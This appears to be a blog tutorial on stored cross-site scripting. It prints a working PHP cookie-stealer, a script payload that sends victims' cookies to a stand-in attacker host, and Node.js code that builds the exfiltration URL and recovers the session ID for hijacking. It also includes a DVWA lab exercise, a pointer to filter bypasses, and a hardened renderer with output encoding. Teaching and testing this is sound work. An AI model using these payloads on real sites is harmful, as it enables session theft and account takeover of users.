Performing Stored XSS Attacks

In the last post on cross-site scripting we discussed how to perform a reflected XSS attack. In this post we will discuss how to perform a stored XSS attack. A stored XSS attack occurs when an attacker uses an XSS vulnerability in a web application to store a submitted script in the application's database, from where it is later displayed to other users without being filtered or encoded.

Stored XSS vulnerabilities are common in web applications that support interaction between several users, for example guest books, comment replies, question forms, response forms and review sections. If an attacker manages to embed JavaScript in such an application, it lets him/her attack every user who views the submitted data, without having to lure each victim to a crafted link as in the reflected case. In practice both attacks are performed in the same way but against different kinds of web applications: in reflected XSS the victim's own request carries the payload, in stored XSS the server serves it to everyone.

Let's consider a real example. Suppose an attacker wants to steal users' cookies from some abcxyz forum. First of all he/she will prepare a cookie stealer; the following PHP script is a simple example of a cookie stealer (you can also create one with JavaScript or any other server-side language).
<?php
// Append whatever arrives in the "cookie" query parameter to a log file,
// one line per request.
if (isset($_GET['cookie'])) {
    $cookie = $_GET['cookie'];
    $fh = fopen("cookies.txt", "a");
    fwrite($fh, $cookie . "\n");
    fclose($fh);
}
?>
Now suppose he/she has hosted this script at http://www.attacker.com/stealer.php, where attacker.com is the attacker's website. While replying in the web application he/she will enter a name and also embed JavaScript that calls the script every time someone visits the thread or reply created by the attacker. Note that the src must include the scheme and host; without "http://" the browser treats it as a path relative to the vulnerable site, and the request never reaches the attacker. Also note that document.cookie only exposes cookies set without the HttpOnly flag, which is why that flag is a useful mitigation. The JavaScript might appear as follows,
<script>
document.write('<img style="display: none;" src="http://www.attacker.com/stealer.php?cookie=' + encodeURIComponent(document.cookie) + '"/>');
</script>
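To make the exfiltration step concrete, here is an added example (not code from the original post) that shows both ends of it in Node.js: how the payload turns the victim's document.cookie into a request URL, and how the attacker's receiving side gets the cookie jar back out of that request. The host name, path and the sample cookie values are assumptions made for the example.

```javascript
// Added example, not from the original post. Attacker host and path are assumed.
const STEALER_URL = "http://www.attacker.com/stealer.php";

// Victim-browser side: document.cookie is a single string such as "a=1; b=2".
// encodeURIComponent stops ';', '=', '&' and spaces inside cookie values from
// being misread as query-string structure by the receiving server.
function buildExfilUrl(cookieString) {
  return STEALER_URL + "?cookie=" + encodeURIComponent(cookieString);
}

// The payload as it would be written into the stored comment. The <img> is
// hidden so the victim sees nothing, but the browser still fetches its src,
// which is what delivers the cookie to the attacker.
function buildPayloadHtml() {
  return (
    "<script>document.write('<img style=\"display: none;\" src=\"" + STEALER_URL +
    "?cookie=' + encodeURIComponent(document.cookie) + '\"/>');</script>"
  );
}

// Receiving side, i.e. what stealer.php sees in $_GET['cookie']: take the
// request URL, pull out the (URL-decoded) cookie parameter and split it back
// into a name -> value map.
function parseStolenCookies(requestUrl) {
  const raw = new URL(requestUrl).searchParams.get("cookie") || "";
  const jar = {};
  for (const part of raw.split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    jar[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return jar;
}

// Constructed sample of what document.cookie might return on a DVWA instance
// (values are made up for this example).
const SAMPLE_COOKIE = "security=low; PHPSESSID=abc123def456";

// Stand-alone run: show the URL the victim's browser would request and what
// the attacker recovers from it.
console.log(buildExfilUrl(SAMPLE_COOKIE));
console.log(parseStolenCookies(buildExfilUrl(SAMPLE_COOKIE)));
```

The PHPSESSID value recovered on the attacker's side is the session identifier; replaying it in a Cookie header is what lets the attacker act as the victim, as long as the session has not expired and the application does not bind sessions to anything else.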
To practice a stored XSS attack on DVWA, first set the security level to low, then select "XSS (Stored)". In the name field type HACKER and in the message field type the following line,
Visit <script>alert('Hi from HACKER')</script> <a href="https://xtraweb.wordpress.com">XTRA WEB</a>
After pressing the submit button your message is stored in DVWA. From then on, every time anyone loads the guestbook page (for example by posting another message) the script embedded in the message from HACKER executes, because the page echoes the stored entries back without encoding them. Now refer to the cheat sheet and try the higher security levels. Those who can read code should also look at the code DVWA shows through its "View Source" button to see what each level filters.
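The exercise above works because the guestbook concatenates the stored name and message straight into the page. The following added example (my own illustration, not DVWA's code) shows a minimal guestbook renderer in that vulnerable form next to a hardened form that HTML-encodes the stored values on output, and runs the tutorial's HACKER payload through both. The entries are constructed sample data.

```javascript
// Added example, not DVWA's code. Sample entries below are constructed.

// HTML-encode the characters that can change context in text nodes and in
// double- or single-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: stored fields are concatenated straight into the markup, so a
// message containing <script> becomes executable on every page load.
function renderGuestbookVulnerable(entries) {
  return entries
    .map(e => `<div class="entry">Name: ${e.name}<br />Message: ${e.message}<br /></div>`)
    .join("\n");
}

// Hardened: the same template, but every stored value is encoded on output.
// The payload is still in the database; it just renders as visible text.
function renderGuestbookSafe(entries) {
  return entries
    .map(e => `<div class="entry">Name: ${escapeHtml(e.name)}<br />Message: ${escapeHtml(e.message)}<br /></div>`)
    .join("\n");
}

// Crude check a tester can run over rendered output: does a <script> tag
// survive as live markup? This only covers the tutorial's payload style;
// real detection also has to consider event handlers, javascript: URLs, etc.
function containsLiveScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed sample: a normal entry plus the tutorial's HACKER entry.
const SAMPLE_ENTRIES = [
  { name: "test", message: "This is a test comment." },
  {
    name: "HACKER",
    message: "Visit <script>alert('Hi from HACKER')</script> <a href=\"https://xtraweb.wordpress.com\">XTRA WEB</a>",
  },
];

// Stand-alone run: compare the two renderings.
console.log("--- vulnerable ---\n" + renderGuestbookVulnerable(SAMPLE_ENTRIES));
console.log("--- hardened ---\n" + renderGuestbookSafe(SAMPLE_ENTRIES));
```

Output encoding is the fix that actually closes the hole; input filtering of the kind DVWA's medium level does (stripping one spelling of "<script>") is what the cheat sheet is for bypassing. Marking session cookies HttpOnly limits the damage of the cookie stealer but does nothing against a payload that simply performs actions in the victim's browser.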
If something was difficult to understand then please feel free to ask. Thanks for reading, have a nice time and keep visiting.